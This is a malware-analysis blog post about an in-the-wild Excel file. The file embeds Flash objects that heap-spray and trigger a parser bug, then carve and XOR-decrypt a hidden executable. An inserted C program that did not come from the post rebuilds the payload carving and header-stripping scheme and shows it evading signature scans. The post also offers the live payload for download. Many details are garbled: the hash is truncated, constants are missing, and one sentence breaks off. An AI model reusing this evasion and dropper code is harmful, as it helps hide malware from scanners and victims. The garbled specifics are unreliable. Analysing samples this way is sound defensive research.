Then, after days, Adobe confirmed the bug and released an advisory.
MD Hash: BBCDAFDAFADDE
My analysis of crsenvironscan.xls
There is no vulnerability in MS Office itself; the vulnerability is in the embedded SWF, as described below.
1) There is an embedded SWF (target file name f:\sm.swf).
This SWF performs a heap spray and then loads a second SWF.
From the source code: it allocates memory, fills it with a NOP slide (NOP Slide = ), and then loads the second SWF.
2) second.swf contains the bug.
The file was possibly created using a fuzzer from
It looks like bugs exist when Flash Player attempts to parse a SWF file:
Unknown opcode . Unknown opcode .
(A detailed analysis will be provided soon.)
This is EmbededExec shellcode, not encrypted.
The shellcode searches the host file for the exe between two 8-byte markers, each checked as a pair of dword compares. Start marker:
cmp dword ptr [eax], E43h
cmp dword ptr [eax+], 19890604h
(hex code "e"), and end marker:
cmp dword ptr [eax], B635546h
cmp dword ptr [eax+], 19820424h
(hex code "b").
Looking at it from this point of view, to me that looks like a string and a date:
C.GB 1989/06/04 - it may mean 1989-06-04, Tiananmen, Beijing, China
FucK 1982/04/24 - ?
If you have any ideas, post them in the comments.
The encryption of the exe is interesting.
The first bytes of the exe header are written by the shellcode itself; then the encrypted data is decrypted using this algorithm, where eax is the size of the exe:
xor [ebx], al
inc ebx
dec eax
inc ebx
dec eax
cmp eax,
Since al is the low byte of the running counter, each touched byte is XORed with a different key value, and the two inc/dec pairs mean only every other byte is touched.
This is the first time I have seen such encryption in exploits found in the wild.
It is used to bypass scanners that search for the exe header: the header bytes are never stored in the file, and the rest does not match a plaintext signature.
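The marker search and the decrypt loop above, as an added example in C (not code from the post or the shellcode). It reconstructs the byte layout of the two markers from the strings and dates the post gives ("C.GB" + 19890604h, "FucK" + 19820424h), which is an assumption since the post's cmp constants are garbled; the number of header bytes the shellcode writes ("MZ", two bytes) and the lost cmp operand (the loop is assumed to stop when the counter runs out) are also assumptions. The sample host document and the fake exe inside it are constructed here.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Markers the post reports: an ASCII tag followed by a dword that reads as a
 * date in hex (19890604h, 19820424h).  Tag bytes in memory order, then the
 * date dword little-endian: this layout is an assumption of this example. */
static const uint8_t START_MARK[8] = { 'C', '.', 'G', 'B', 0x04, 0x06, 0x89, 0x19 };
static const uint8_t END_MARK[8]   = { 'F', 'u', 'c', 'K', 0x24, 0x04, 0x82, 0x19 };

/* Header bytes the shellcode writes itself instead of storing in the file.
 * The post does not say how many; two ("MZ") is assumed here. */
#define HDR_LEN 2
static const uint8_t EXE_HDR[HDR_LEN] = { 'M', 'Z' };

/* The decrypt loop from the post:
 *     xor [ebx], al ; inc ebx ; dec eax ; inc ebx ; dec eax ; cmp eax, ?
 * eax starts as the exe size, so al (its low byte) is a running counter that
 * doubles as the key, and only every other byte is touched.  XOR is its own
 * inverse, so the same routine encrypts.  The cmp operand is lost on the
 * page; stopping when the counter is exhausted is assumed. */
static void xor_counter_skip(uint8_t *buf, size_t len)
{
    size_t eax = len;
    uint8_t *ebx = buf;
    while (eax > 0) {
        *ebx ^= (uint8_t)eax;   /* xor [ebx], al */
        if (eax == 1) break;    /* odd tail: nothing left to skip over */
        ebx += 2;               /* inc ebx ; inc ebx */
        eax -= 2;               /* dec eax ; dec eax */
    }
}

/* Offset of an 8-byte marker at or after `from`, or -1 if absent. */
static long find_marker(const uint8_t *hay, size_t n, const uint8_t mark[8], size_t from)
{
    for (size_t i = from; i + 8 <= n; i++)
        if (memcmp(hay + i, mark, 8) == 0)
            return (long)i;
    return -1;
}

/* What the shellcode does: scan the host document in memory for the two
 * markers, carve what lies between them, decrypt it with eax = exe size,
 * then patch in the header bytes.  Returns payload length, 0 on failure. */
static size_t carve_payload(const uint8_t *host, size_t host_len,
                            uint8_t *out, size_t out_cap)
{
    long s = find_marker(host, host_len, START_MARK, 0);
    if (s < 0) return 0;
    long e = find_marker(host, host_len, END_MARK, (size_t)s + 8);
    if (e < 0) return 0;
    size_t len = (size_t)e - ((size_t)s + 8);
    if (len < HDR_LEN || len > out_cap) return 0;
    memcpy(out, host + s + 8, len);
    xor_counter_skip(out, len);       /* eax = size of exe */
    memcpy(out, EXE_HDR, HDR_LEN);    /* header comes from the shellcode */
    return len;
}

/* Constructed sample: a fake PE-like image (50 bytes, even length). */
static const uint8_t SAMPLE_EXE[] =
    "MZ\x90\x00\x03\x00\x00\x00PE\x00\x00This program cannot be run in DOS mode";
#define SAMPLE_LEN (sizeof(SAMPLE_EXE) - 1)

/* Build a constructed host file: filler, start marker, the exe with its
 * header bytes blanked and the rest encrypted, end marker, filler. */
static size_t build_host(uint8_t *host, size_t cap)
{
    static const char filler[] = "\xd0\xcf\x11\xe0 xls filler ";
    const size_t fl = sizeof filler - 1;
    uint8_t blob[SAMPLE_LEN];
    if (cap < 2 * fl + 16 + SAMPLE_LEN) return 0;
    memcpy(blob, SAMPLE_EXE, SAMPLE_LEN);
    memset(blob, 0, HDR_LEN);              /* header is not stored in the file */
    xor_counter_skip(blob, SAMPLE_LEN);    /* encrypt with the same loop */
    size_t n = 0;
    memcpy(host + n, filler, fl);          n += fl;
    memcpy(host + n, START_MARK, 8);       n += 8;
    memcpy(host + n, blob, SAMPLE_LEN);    n += SAMPLE_LEN;
    memcpy(host + n, END_MARK, 8);         n += 8;
    memcpy(host + n, filler, fl);          n += fl;
    return n;
}

/* A naive signature scan, the kind of check the scheme is meant to defeat. */
static int host_contains(const uint8_t *host, size_t n, const char *sig, size_t sig_len)
{
    for (size_t i = 0; i + sig_len <= n; i++)
        if (memcmp(host + i, sig, sig_len) == 0) return 1;
    return 0;
}

int main(void)
{
    uint8_t host[512], exe[256];
    size_t hn = build_host(host, sizeof host);
    size_t en = carve_payload(host, hn, exe, sizeof exe);
    printf("host contains MZ: %d, PE\\0\\0: %d\n",
           host_contains(host, hn, "MZ", 2), host_contains(host, hn, "PE\0\0", 4));
    printf("carved %zu bytes, header %.2s, matches original: %d\n", en,
           (const char *)exe, en == SAMPLE_LEN && memcmp(exe, SAMPLE_EXE, SAMPLE_LEN) == 0);
    return 0;
}
```

Running it shows the host document contains neither "MZ" nor "PE\0\0" anywhere, yet carve_payload reproduces the original image byte for byte; that is the whole point of writing the header from the shellcode and keying the XOR off the counter rather than a fixed byte.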
Download payload file a.exe (password: infected).
VirusTotal: 0/43.
PEiD information: InstallShield AFW [CAB SFX].